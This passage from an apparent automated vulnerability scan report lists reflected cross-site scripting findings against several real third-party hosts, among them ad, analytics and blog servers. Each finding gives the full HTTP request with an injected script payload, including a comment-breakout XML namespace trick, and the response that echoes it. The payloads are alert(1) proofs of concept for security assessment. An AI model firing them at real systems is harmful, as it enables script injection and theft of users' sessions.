Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: UID=2695e1-80.67.74.150-1312230894

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:00:30 GMT
Date: Tue, 06 Sep 2011 15:00:30 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2b7be8<script>alert(1)</script>8499cdf77af", c2:"1000004", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.16. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload b8f5c<script>alert(1)</script>26c563a3d19 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=b8f5c<script>alert(1)</script>26c563a3d19&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:53 GMT
Date: Tue, 06 Sep 2011 15:32:53 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"b8f5c<script>alert(1)</script>26c563a3d19", c15:"", c16:"", r:""});



3.17. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 3f055<script>alert(1)</script>215fffaf43b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=&c15=3f055<script>alert(1)</script>215fffaf43b HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:53 GMT
Date: Tue, 06 Sep 2011 15:32:53 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
RE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"", c15:"3f055<script>alert(1)</script>215fffaf43b", c16:"", r:""});



3.18. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 302ec<script>alert(1)</script>901d717b8ca was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693302ec<script>alert(1)</script>901d717b8ca&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:51 GMT
Date: Tue, 06 Sep 2011 15:32:51 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693302ec<script>alert(1)</script>901d717b8ca", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.19. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload d7c1e<script>alert(1)</script>9d9537f6b13 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1d7c1e<script>alert(1)</script>9d9537f6b13&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:51 GMT
Date: Tue, 06 Sep 2011 15:32:51 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1d7c1e<script>alert(1)</script>9d9537f6b13", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.20. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 41993<script>alert(1)</script>fc7d8b09653 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F41993<script>alert(1)</script>fc7d8b09653&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:52 GMT
Date: Tue, 06 Sep 2011 15:32:52 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/41993<script>alert(1)</script>fc7d8b09653", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.21. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 56553<script>alert(1)</script>e3dfef08947 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=56553<script>alert(1)</script>e3dfef08947&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:52 GMT
Date: Tue, 06 Sep 2011 15:32:52 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
th-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"56553<script>alert(1)</script>e3dfef08947", c6:"", c10:"", c15:"", c16:"", r:""});



3.22. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload d95cf<script>alert(1)</script>677d9af4a8c was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=d95cf<script>alert(1)</script>677d9af4a8c&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:53 GMT
Date: Tue, 06 Sep 2011 15:32:53 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"d95cf<script>alert(1)</script>677d9af4a8c", c10:"", c15:"", c16:"", r:""});



3.23. http://blog.harbottle.com/dm/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.harbottle.com
Path:   /dm/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23d3a"><script>alert(1)</script>32285faa682 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23d3a\"><script>alert(1)</script>32285faa682 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dm/index.php/23d3a"><script>alert(1)</script>32285faa682 HTTP/1.1
Host: blog.harbottle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:38 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
X-Pingback: http://blog.harbottle.com/dm/xmlrpc.php
Status: 200 OK
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28771

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>Digital Media Law</title>
<base href="http://blog.harbottle.com/dm/">
...[SNIP]...
<a href="http://blog.harbottle.com/dm/index.php/23d3a\"><script>alert(1)</script>32285faa682?paged=2">
...[SNIP]...

3.24. http://blog.ulf-wendel.de/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.ulf-wendel.de
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45b78"><script>alert(1)</script>06485f2279d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45b78\"><script>alert(1)</script>06485f2279d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?45b78"><script>alert(1)</script>06485f2279d=1 HTTP/1.1
Host: blog.ulf-wendel.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:38 GMT
Server: Apache
X-Pingback: http://blog.ulf-wendel.de/xmlrpc.php
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 146066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...
<a href="http://blog.ulf-wendel.de/?45b78\"><script>alert(1)</script>06485f2279d=1&amp;paged=2">
...[SNIP]...

3.25. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload d2555<script>alert(1)</script>79d6c0d4362 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAAAFcSbzI~,OkyYKKfkn3za9MF0qI3Ufg1AerdkqfR3 HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
Content-Length: 532
Origin: http://blogs.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-amf
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Qa39efb8859c99888a16c5b96b94383131a9ffbbe
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:13:02 GMT
Server:
Content-Length: 3570

......../1/onResult......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
A........eAQ~~,AAAAAFcSbzI~,OkyYKKfkn3za9MF0qI3Ufg1AerdkqfR3.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO..mediaId.componentRefId.playerId    type.mediaDTO
..Bjz... ..ivideoPlayerd2555<script>alert(1)</script>79d6c0d4362..........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription
...[SNIP]...

3.26. http://cdn.krxd.net/config/ [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.krxd.net
Path:   /config/

Issue detail

The value of the site request parameter is copied into the HTML document as plain text between tags. The payload b16f3<script>alert(1)</script>76bb110beda was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /config/?pubid=d719e39d-e4be-4896-8d71-71012d0c51a0&site=cnbc.comb16f3<script>alert(1)</script>76bb110beda&callback=KRUX.configOnload HTTP/1.1
Host: cdn.krxd.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _kuid_=10.32.46.226.1315320921124944; ServedBy=logger-b005

Response

HTTP/1.1 404 Not Found
Content-Type: text/javascript
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: TornadoServer/1.2
X-Config-Cache: Miss
X-Request-Time: D=10601 t=1315321012024997
X-Served-By: logger-b011.krxd.net
Content-Length: 91
Date: Tue, 06 Sep 2011 14:56:52 GMT
Connection: close

{"error": "Non existant site for NBCU - cnbc.comb16f3<script>alert(1)</script>76bb110beda"}

3.27. http://content.plymedia.com/initialize [video parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.plymedia.com
Path:   /initialize

Issue detail

The value of the video request parameter is copied into an XML comment. The payload cafa3--><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>94f14959222 was submitted in the video parameter. This input was echoed as cafa3--><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>94f14959222 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /initialize?video=cafa3--><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>94f14959222 HTTP/1.1
Host: content.plymedia.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s1bwwjcc2333zalrmiy15feu

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/xml; charset=utf-8
Expires: Tue, 06 Sep 2011 16:15:32 GMT
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:14:32 GMT
Content-Length: 599
Connection: keep-alive

<!--9/6/2011 4:14:32 PM [Cached For:60, From: http://services.plymedia.com/initialize?video=cafa3--><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>94f14959222]--><!--9/6/2011
...[SNIP]...

3.28. http://d7.zedo.com/jsc/d3/fl.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbdf7'-alert(1)-'8a1211d7b4b was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=cbdf7'-alert(1)-'8a1211d7b4b&z=0224774881 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=416
Expires: Tue, 06 Sep 2011 15:22:56 GMT
Date: Tue, 06 Sep 2011 15:16:00 GMT
Content-Length: 1895
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;


               
...[SNIP]...
%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=cbdf7'-alert(1)-'8a1211d7b4b">
...[SNIP]...

3.29. http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /lar/v11-001/d7/jsc/flr.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1aa06'-alert(1)-'af6ec576df9 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lar/v11-001/d7/jsc/flr.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=1aa06'-alert(1)-'af6ec576df9&z=0224774881 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1ea7ed1-4fbc-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=416
